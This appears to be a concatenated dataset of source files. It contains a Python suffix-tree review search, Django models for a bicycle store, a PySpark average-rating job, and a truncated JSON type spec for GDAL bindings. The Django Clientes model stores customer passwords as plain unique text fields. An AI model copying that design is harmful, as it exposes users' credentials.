import collections, os, re, sys, json, timeit, time from tst.suffix import SuffixTree from tst import TST stop = {'a', 'an', 'the', 'their', 'my', 'me', 'mine', 'my', 'i', 'am', 'but', 'is', "isn't", 'was', "wasn't"} index = SuffixTree() reviews = dict() results = dict() def clean(text): return ( text .lower() .replace('/', '') .replace('(', '') .replace(')', '') .replace(':', '') .replace('.', '') .replace(',', '') .replace(';', '') .replace(';', '') .replace('?', ' ?') .replace('!', ' !') .replace('-', ' - ')) def index_review(revid, review): revid = revid.strip() text = clean(review.strip().lower()) reviews[revid] = (id, text) for word in set(text.split())-stop: revs = index.get(word, set()) if not revs: revs.add(revid) index[word] = revs else: revs.add(revid) def mkindex(fname): print fname with open(fname, 'r') as f: for i, line in enumerate(f): #if i > 100: break if i % 100 == 0: print i sys.stdout.flush() revid, review = line.split(':', 1) index_review(revid, review) def query(*substrs): ssres = [re.compile('.{0,35}%s.{0,35}'%substr.replace('?', '\?')) for substr in substrs] def f_index(): for substr in substrs: list(index.find(substr)) def f_brute(): for substr in substrs: [text.find(substr) for id, text in reviews.values()] #import pdb #pdb.set_trace() #print timeit.timeit(f_index, number=10) #print timeit.timeit(f_brute, number=10) sets = [set() for substr in substrs] for i,substr in enumerate(substrs): for word, revids in index.find(substr): sets[i] |= revids revids = sets[0] for rvs in sets[1:]: revids &= rvs revids = [revid.decode('utf8') for revid in revids] results[' '.join(substrs).decode('utf8')] = revids print json.dumps(revids) def main(): mkindex(sys.argv[1]) print len(reviews) #sys.stderr.write('repeater.py: starting\n') sys.stdout.flush() while True: sys.stdout.write('> '); sys.stdout.flush() try: inpt = sys.stdin.readline() except: break; #if inpt is None: break; if not inpt: continue inpt = clean(inpt) #sys.stdout.write(inpt) #sys.stdout.flush() inpt = inpt.split() query(*inpt) sys.stdout.flush() time.sleep(1) print 'finished' #print >>sys.stderr, results with open('results.json', 'w') as f: json.dump(results, f) if __name__ == '__main__': main()
[ "tim.tadh@gmail.com" ]
tim.tadh@gmail.com
691845312b03bffcaabddee6ca4377487a883d3f
073310af8448572761a52aa55df126572ba7fb47
/tiendavirtual/models.py
9d15bd8e02b7638452a23028d5e9a1b112f5c1fa
[]
no_license
williampalacios/bicicletas-once
833565f9b7a1c745528c26edce944baea7f2a9c2
db296c1f58de23ffd4bad6ecfeb90679d4211ada
refs/heads/master
2020-09-10T21:18:35.460121
2019-11-15T22:22:27
2019-11-15T22:22:27
221,818,635
0
0
null
null
null
null
UTF-8
Python
false
false
9,768
py
# This is an auto-generated Django model module. # You'll have to do the following manually to clean this up: # * Rearrange models' order # * Make sure each model has one field with primary_key=True # * Make sure each ForeignKey has `on_delete` set to the desired behavior. # * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table # Feel free to rename the models, but don't rename db_table values or field names. from django.db import models from imagekit.models import ImageSpecField from imagekit.processors import ResizeToFill, Adjust from django.urls import reverse #Used to generate URLs by reversing the URL patterns class Categorias(models.Model): idcategoria = models.IntegerField(db_column='idCategoria', primary_key=True) # Field name made lowercase. nombrecategoria = models.CharField(db_column='nombreCategoria', unique=True, max_length=15) # Field name made lowercase. descripcion = models.CharField(db_column='Descripcion', unique=True, max_length=255, blank=True, null=True) # Field name made lowercase. imagen = models.CharField(db_column='Imagen', unique=True, max_length=45, blank=True, null=True) # Field name made lowercase. def __str__(self): return self.nombrecategoria class Meta: #managed = False db_table = 'Categorias' class Clientes(models.Model): idcliente = models.IntegerField(db_column='idCliente', primary_key=True) # Field name made lowercase. nombrecontacto = models.CharField(db_column='NombreContacto', max_length=45) # Field name made lowercase. direccion = models.CharField(db_column='Direccion', max_length=45) # Field name made lowercase. ciudad = models.CharField(db_column='Ciudad', max_length=15) # Field name made lowercase. localidad = models.CharField(db_column='Localidad', max_length=15) # Field name made lowercase. codpostal = models.CharField(db_column='CodPostal', max_length=10) # Field name made lowercase. pais = models.CharField(db_column='Pais', max_length=15) # Field name made lowercase. telefono = models.CharField(db_column='Telefono', unique=True, max_length=15) # Field name made lowercase. e_mail = models.CharField(db_column='e-mail', unique=True, max_length=45) # Field renamed to remove unsuitable characters. password = models.CharField(db_column='Password', unique=True, max_length=15) # Field name made lowercase. def __str__(self): return self.e_mail class Meta: #managed = False db_table = 'Clientes' class Companiasdeenvios(models.Model): idcompañiasdeenvio = models.IntegerField(db_column='idCompañiasDeEnvio', primary_key=True) # Field name made lowercase. nombrecompañia = models.CharField(db_column='NombreCompañia', unique=True, max_length=20) # Field name made lowercase. telefono = models.CharField(db_column='Telefono', unique=True, max_length=15) # Field name made lowercase. e_mail = models.CharField(db_column='e-mail', unique=True, max_length=45) # Field renamed to remove unsuitable characters. def __str__(self): return self.nombrecompañia class Meta: #managed = False db_table = 'CompañiasDeEnvios' class Pedidos(models.Model): idpedido = models.IntegerField(db_column='idPedido', primary_key=True) # Field name made lowercase. fechapedido = models.DateField(db_column='FechaPedido') # Field name made lowercase. fechaentrega = models.DateField(db_column='FechaEntrega', blank=True, null=True) # Field name made lowercase. fechaenvio = models.DateField(db_column='FechaEnvio', blank=True, null=True) # Field name made lowercase. monto = models.FloatField(db_column='Monto') # Field name made lowercase. destinatario = models.CharField(db_column='Destinatario', max_length=30) # Field name made lowercase. direcciondestinatario = models.CharField(db_column='DireccionDestinatario', max_length=45) # Field name made lowercase. ciudaddestinatario = models.CharField(db_column='CiudadDestinatario', max_length=15) # Field name made lowercase. localidaddestinatario = models.CharField(db_column='LocalidadDestinatario', max_length=20) # Field name made lowercase. codpostaldestinatario = models.CharField(db_column='CodPostalDestinatario', max_length=10) # Field name made lowercase. paisdestinatario = models.CharField(db_column='PaisDestinatario', max_length=15) # Field name made lowercase. idcompañiasdeenvio = models.ForeignKey(Companiasdeenvios, models.PROTECT, db_column='IdCompañiasDeEnvio') # Field name made lowercase. idcliente = models.ForeignKey(Clientes, models.PROTECT, db_column='idCliente') # Field name made lowercase. pago_estado = ( ('a', 'Aprovado'), ('p', 'Pendiente'), ('r', 'Rechazado'), ) estadopago = models.CharField(db_column='EstadoPago', max_length=1, choices=pago_estado) # Field name made lowercase. pago_forma = ( ('e', 'Efectivo'), ('d', 'Depósito'), ) formapago = models.CharField(db_column='FormaPago', max_length=1, choices=pago_forma) # Field name made lowercase. def __str__(self): return str(self.idpedido) + " / " + str(self.idcliente) + " / " + self.destinatario class Meta: #managed = False db_table = 'Pedidos' class Proveedores(models.Model): idproveedor = models.IntegerField(db_column='idProveedor', primary_key=True) # Field name made lowercase. nombrecompañia = models.CharField(db_column='NombreCompañia', unique=True, max_length=20) # Field name made lowercase. nombrecontacto = models.CharField(db_column='NombreContacto', max_length=45) # Field name made lowercase. cargocontacto = models.CharField(db_column='CargoContacto', max_length=15) # Field name made lowercase. direccion = models.CharField(db_column='Direccion', max_length=45) # Field name made lowercase. ciudad = models.CharField(db_column='Ciudad', max_length=15) # Field name made lowercase. localidad = models.CharField(db_column='Localidad', max_length=15) # Field name made lowercase. codpostal = models.CharField(db_column='CodPostal', max_length=10) # Field name made lowercase. pais = models.CharField(db_column='Pais', max_length=15) # Field name made lowercase. telefono = models.CharField(db_column='Telefono', unique=True, max_length=15) # Field name made lowercase. e_mail = models.CharField(db_column='e-mail', unique=True, max_length=45) # Field renamed to remove unsuitable characters. paginaprincipal = models.CharField(db_column='PaginaPrincipal', unique=True, max_length=30, blank=True, null=True) # Field name made lowercase. def __str__(self): return self.nombrecompañia class Meta: #managed = False db_table = 'Proveedores' class Productos(models.Model): idproducto = models.IntegerField(db_column='idProducto', primary_key=True) # Field name made lowercase. nombreproducto = models.CharField(db_column='NombreProducto', unique=True, max_length=45) # Field name made lowercase. cantidadporunidad = models.IntegerField(db_column='CantidadPorUnidad') # Field name made lowercase. preciounidad = models.FloatField(db_column='PrecioUnidad') # Field name made lowercase. unidadesenexistencia = models.IntegerField(db_column='UnidadesEnExistencia') # Field name made lowercase. unidadesenpedido = models.IntegerField(db_column='UnidadesEnPedido') # Field name made lowercase. demanda_nivel = ( ('b', 'Bajo'), ('m', 'Medio'), ('a', 'Alto'), ) demanda = models.CharField(db_column='Demanda', max_length=1, choices=demanda_nivel) # Field name made lowercase. es_suspendido = ( ('s','Sí'), ('n','No'), ) suspendido = models.CharField(db_column='Suspendido', max_length=1, choices=es_suspendido) # Field name made lowercase. idproveedor = models.ForeignKey(Proveedores, models.PROTECT, db_column='IdProveedor') # Field name made lowercase. idcategoria = models.ForeignKey(Categorias, models.PROTECT, db_column='idCategoria') # Field name made lowercase. imagen = models.CharField(db_column='Imagen', unique=True, max_length=45) # Field name made lowercase. imagentest = models.ImageField(upload_to='img_prod', null=True, blank=True) thumbnail = ImageSpecField([Adjust(contrast=1.2, sharpness=1.1), ResizeToFill(50, 50)], source='imagentest', format='JPEG', options={'quality': 90}) def __str__(self): return self.nombreproducto def get_absolute_url(self): """ Devuelve el URL a una instancia particular de Productos """ return reverse('product-detail', args=[str(self.idproducto)]) class Meta: #managed = False db_table = 'Productos' class Detallesdepedidos(models.Model): idpedido = models.ForeignKey(Pedidos, models.PROTECT, db_column='IdPedido', primary_key=True) # Field name made lowercase. idproducto = models.ForeignKey(Productos, models.PROTECT, db_column='IdProducto') # Field name made lowercase. preciounidad = models.FloatField(db_column='PrecioUnidad') # Field name made lowercase. cantidad = models.IntegerField(db_column='Cantidad') # Field name made lowercase. descuento = models.FloatField(db_column='Descuento', blank=True, null=True) # Field name made lowercase. def __str__(self): return "(" + str(self.idpedido) + ") / " + str(self.idproducto) class Meta: #managed = False db_table = 'DetallesDePedidos' unique_together = (('idpedido', 'idproducto'),)
[ "mich.palacios.hdz@gmail.com" ]
mich.palacios.hdz@gmail.com
274c62339c3cc1cf5f7f12fbbeb2be073d312a4f
1eb6a06f77d059bbcab2f8ff9284b3ee70d789c9
/Map-Reduce/avg-rating-by-movie.py
be61cff74f63d6c3e465ee75d9c412c4092c44a0
[]
no_license
neetipandey3/Spark-Scala-and-Python
066a55b5973c470d2c0a13d0557d3e1c7702ebc5
2c53f75c0cda70ce78f83582ef42e204ed07ff8f
refs/heads/master
2020-03-19T00:56:43.447342
2018-07-19T21:23:07
2018-07-19T21:23:07
135,511,528
0
0
null
null
null
null
UTF-8
Python
false
false
2,233
py
import sys, csv, os from pyspark import SparkContext ''' Movie Average Rating by movieId Input: :parameter #1: input file path (ratings.csv) :parameter #2: output file path Output: Neeti_Pandey_result_task1.csv; values = (movieId, avg_rating) ''' class MovieRating: def getMovieAvgRating(self, rdd): # Prepare ratings from ratings data as (movieId, (ratings, 1.0)) ratings_rdd = rdd.map(lambda row: row.split(',')).map(lambda cols: (int(cols[1]), (float(cols[2]), 1.0))) #ratings_sumcount_rdd = ratings_rdd.aggregateByKey((0, 0), lambda x, y: (x[0] + y, x[1]+1), lambda rdd1, rdd2: (rdd1[0]+rdd2[0], rdd1[1]+rdd2[1])) #ratings_avg_rdd = ratings_sumcount_rdd.map(lambda x: (int(x[0]), x[1][0] / x[1][1])).sortByKey(ascending=True) #return ratings_avg_rdd.collect() # Reduce to (movieID, (ratings_sum, total_no_of_ratings)) sum_count_ratings_rdd = ratings_rdd.reduceByKey(lambda mov1, mov2: (mov1[0] + mov2[0], mov1[1] + mov2[1])) avg_rating_rdd = sum_count_ratings_rdd.mapValues(lambda sumAndCount: sumAndCount[0] / sumAndCount[1]).sortByKey(ascending=True) return avg_rating_rdd.collect() def writeOutput(self, movie_avgrating_rdd, op_path, op_filename): open_file = open(os.path.join(op_path, op_filename), 'w') writer = csv.writer(open_file) # add header to output csv writer.writerow(["movieId", "rating_avg"]) for row in movie_avgrating_rdd: writer.writerow([row[0], row[1]]) open_file.close() def main(): sc = SparkContext(appName="MovieRatingMovieLens") input_path = sys.argv[1] output_path = sys.argv[2] input_filename = "ratings.csv" output_filename = "Neeti_Pandey_result_task1.csv" rdd_data = sc.textFile(os.path.join(input_path, input_filename)) # get rid of the header of the input file csv_header = rdd_data.first() csv_header_rdd = sc.parallelize([csv_header]) rdd = rdd_data.subtract(csv_header_rdd) task1 = MovieRating() movie_avgrating_rdd = task1.getMovieAvgRating(rdd) task1.writeOutput(movie_avgrating_rdd, output_path, output_filename) if __name__ == "__main__": main()
[ "neetipandey3@gmail.com" ]
neetipandey3@gmail.com
8b621ea6bcba2ad286662444d9729a742fcad36f
e32d56a2b1ae252bbc92d72c23f773a6c1919bb7
/specs/gdal.x86_64-unknown-freebsd.spec
f2596ca418bc3660eb0b59c081b60d6e3ae4b61f
[ "ISC" ]
permissive
jl2/cl-gdal
3dccb1bb3632cba82e57387f773562694aa781c7
e67a00192857d8d905350685733f8de0ecf76f21
refs/heads/master
2020-08-03T03:34:42.691420
2019-11-25T22:46:04
2019-11-25T22:46:04
211,612,993
3
0
null
null
null
null
UTF-8
Python
false
false
3,029,959
spec
[ { "tag": "typedef", "ns": 0, "name": "size_t", "location": "/usr/lib/clang/9.0.0/include/stddef.h:46:23", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "va_list", "location": "/usr/lib/clang/9.0.0/include/stdarg.h:14:27", "type": { "tag": "__builtin_va_list" } }, { "tag": "typedef", "ns": 0, "name": "__gnuc_va_list", "location": "/usr/lib/clang/9.0.0/include/stdarg.h:32:27", "type": { "tag": "__builtin_va_list" } }, { "tag": "typedef", "ns": 0, "name": "__u_char", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:31:23", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "typedef", "ns": 0, "name": "__u_short", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:32:28", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "typedef", "ns": 0, "name": "__u_int", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:33:22", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__u_long", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:34:27", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__int8_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:37:21", "type": { "tag": ":signed-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "typedef", "ns": 0, "name": "__uint8_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:38:23", "type": { "tag": ":unsigned-char", "bit-size": 8, "bit-alignment": 8 } }, { "tag": "typedef", "ns": 0, "name": "__int16_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:39:26", "type": { "tag": ":short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "typedef", "ns": 0, "name": "__uint16_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:40:28", "type": { "tag": ":unsigned-short", "bit-size": 16, "bit-alignment": 16 } }, { "tag": "typedef", "ns": 0, "name": "__int32_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:41:20", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__uint32_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:42:22", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__int64_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:44:25", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__uint64_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:45:27", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__int_least8_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:52:18", "type": { "tag": "__int8_t" } }, { "tag": "typedef", "ns": 0, "name": "__uint_least8_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:53:19", "type": { "tag": "__uint8_t" } }, { "tag": "typedef", "ns": 0, "name": "__int_least16_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:54:19", "type": { "tag": "__int16_t" } }, { "tag": "typedef", "ns": 0, "name": "__uint_least16_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:55:20", "type": { "tag": "__uint16_t" } }, { "tag": "typedef", "ns": 0, "name": "__int_least32_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:56:19", "type": { "tag": "__int32_t" } }, { "tag": "typedef", "ns": 0, "name": "__uint_least32_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:57:20", "type": { "tag": "__uint32_t" } }, { "tag": "typedef", "ns": 0, "name": "__int_least64_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:58:19", "type": { "tag": "__int64_t" } }, { "tag": "typedef", "ns": 0, "name": "__uint_least64_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:59:20", "type": { "tag": "__uint64_t" } }, { "tag": "typedef", "ns": 0, "name": "__quad_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:63:18", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__u_quad_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:64:27", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__intmax_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:72:18", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__uintmax_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:73:27", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__dev_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:145:25", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__uid_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:146:25", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__gid_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:147:25", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__ino_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:148:25", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__ino64_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:149:27", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__mode_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:150:26", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__nlink_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:151:27", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__off_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:152:25", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__off64_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:153:27", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__pid_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:154:25", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__fsid_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:155:26", "type": { "tag": "struct", "ns": 0, "name": "", "id": 1, "location": "/usr/include/x86_64-linux-gnu/bits/types.h:155:12 <Spelling=/usr/include/x86_64-linux-gnu/bits/typesizes.h:72:24>", "bit-size": 64, "bit-alignment": 32, "fields": [{ "tag": "field", "name": "__val", "bit-offset": 0, "bit-size": 64, "bit-alignment": 32, "type": { "tag": ":array", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 }, "size": 2 } }] } }, { "tag": "typedef", "ns": 0, "name": "__clock_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:156:27", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__rlim_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:157:26", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__rlim64_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:158:28", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__id_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:159:24", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__time_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:160:26", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__useconds_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:161:30", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__suseconds_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:162:31", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__daddr_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:164:27", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__key_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:165:25", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__clockid_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:168:29", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__timer_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:171:27", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "typedef", "ns": 0, "name": "__blksize_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:174:29", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__blkcnt_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:179:28", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__blkcnt64_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:180:30", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__fsblkcnt_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:183:30", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__fsblkcnt64_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:184:32", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__fsfilcnt_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:187:30", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__fsfilcnt64_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:188:32", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__fsword_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:191:28", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__ssize_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:193:27", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__syscall_slong_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:196:33", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__syscall_ulong_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:198:33", "type": { "tag": ":unsigned-long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__loff_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:202:19", "type": { "tag": "__off64_t" } }, { "tag": "typedef", "ns": 0, "name": "__caddr_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:203:15", "type": { "tag": ":pointer", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 } } }, { "tag": "typedef", "ns": 0, "name": "__intptr_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:206:25", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "typedef", "ns": 0, "name": "__socklen_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:209:23", "type": { "tag": ":unsigned-int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__sig_atomic_t", "location": "/usr/include/x86_64-linux-gnu/bits/types.h:214:13", "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "typedef", "ns": 0, "name": "__mbstate_t", "location": "/usr/include/x86_64-linux-gnu/bits/types/__mbstate_t.h:21:3", "type": { "tag": "struct", "ns": 0, "name": "", "id": 2, "location": "/usr/include/x86_64-linux-gnu/bits/types/__mbstate_t.h:13:9", "bit-size": 64, "bit-alignment": 32, "fields": [{ "tag": "field", "name": "__count", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__value", "bit-offset": 32, "bit-size": 32, "bit-alignment": 32, "type": { "tag": "union", "ns": 0, "name": "", "id": 3, "location": "/usr/include/x86_64-linux-gnu/bits/types/__mbstate_t.h:16:3", "bit-size": 32, "bit-alignment": 32, "fields": [{ "tag": "field", "name": "__wch", "bit-offset": 0, "bit-size": 32, "bit-alignment": 32, "type": { "tag": ":int", "bit-size": 32, "bit-alignment": 32 } }, { "tag": "field", "name": "__wchb", "bit-offset": 0, "bit-size": 32, "bit-alignment": 8, "type": { "tag": ":array", "type": { "tag": ":char", "bit-size": 8, "bit-alignment": 8 }, "size": 4 } }] } }] } }, { "tag": "struct", "ns": 0, "name": "_G_fpos_t", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/__fpos_t.h:10:16", "bit-size": 128, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__pos", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "__off_t" } }, { "tag": "field", "name": "__state", "bit-offset": 64, "bit-size": 64, "bit-alignment": 32, "type": { "tag": "__mbstate_t" } }] }, { "tag": "typedef", "ns": 0, "name": "__fpos_t", "location": "/usr/include/x86_64-linux-gnu/bits/types/__fpos_t.h:14:3", "type": { "tag": ":struct", "name": "_G_fpos_t", "id": 4 } }, { "tag": "struct", "ns": 0, "name": "_G_fpos64_t", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/__fpos64_t.h:10:16", "bit-size": 128, "bit-alignment": 64, "fields": [{ "tag": "field", "name": "__pos", "bit-offset": 0, "bit-size": 64, "bit-alignment": 64, "type": { "tag": "__off64_t" } }, { "tag": "field", "name": "__state", "bit-offset": 64, "bit-size": 64, "bit-alignment": 32, "type": { "tag": "__mbstate_t" } }] }, { "tag": "typedef", "ns": 0, "name": "__fpos64_t", "location": "/usr/include/x86_64-linux-gnu/bits/types/__fpos64_t.h:14:3", "type": { "tag": ":struct", "name": "_G_fpos64_t", "id": 5 } }, { "tag": "struct", "ns": 0, "name": "_IO_FILE", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/__FILE.h:4:8", "bit-size": 0, "bit-alignment": 0, "fields": [] }, { "tag": "typedef", "ns": 0, "name": "__FILE", "location": "/usr/include/x86_64-linux-gnu/bits/types/__FILE.h:5:25", "type": { "tag": "struct", "ns": 0, "name": "_IO_FILE", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/__FILE.h:4:8", "bit-size": 0, "bit-alignment": 0, "fields": [] } }, { "tag": "struct", "ns": 0, "name": "_IO_FILE", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/FILE.h:4:8", "bit-size": 0, "bit-alignment": 0, "fields": [] }, { "tag": "typedef", "ns": 0, "name": "FILE", "location": "/usr/include/x86_64-linux-gnu/bits/types/FILE.h:7:25", "type": { "tag": "struct", "ns": 0, "name": "_IO_FILE", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/__FILE.h:4:8", "bit-size": 0, "bit-alignment": 0, "fields": [] } }, { "tag": "struct", "ns": 0, "name": "_IO_FILE", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h:35:8", "bit-size": 0, "bit-alignment": 0, "fields": [] }, { "tag": "struct", "ns": 0, "name": "_IO_marker", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h:36:8", "bit-size": 0, "bit-alignment": 0, "fields": [] }, { "tag": "struct", "ns": 0, "name": "_IO_codecvt", "id": 0, "location": "/usr/include/x86_64-linux-gnu/bits/types/struct_FILE.h:37:8", "bit-size": 0, "bit-alignment": 0, "fields": [] }, { "tag": "struct", "ns": 0, "name": "_IO_wide_data", "id": 0, "location": 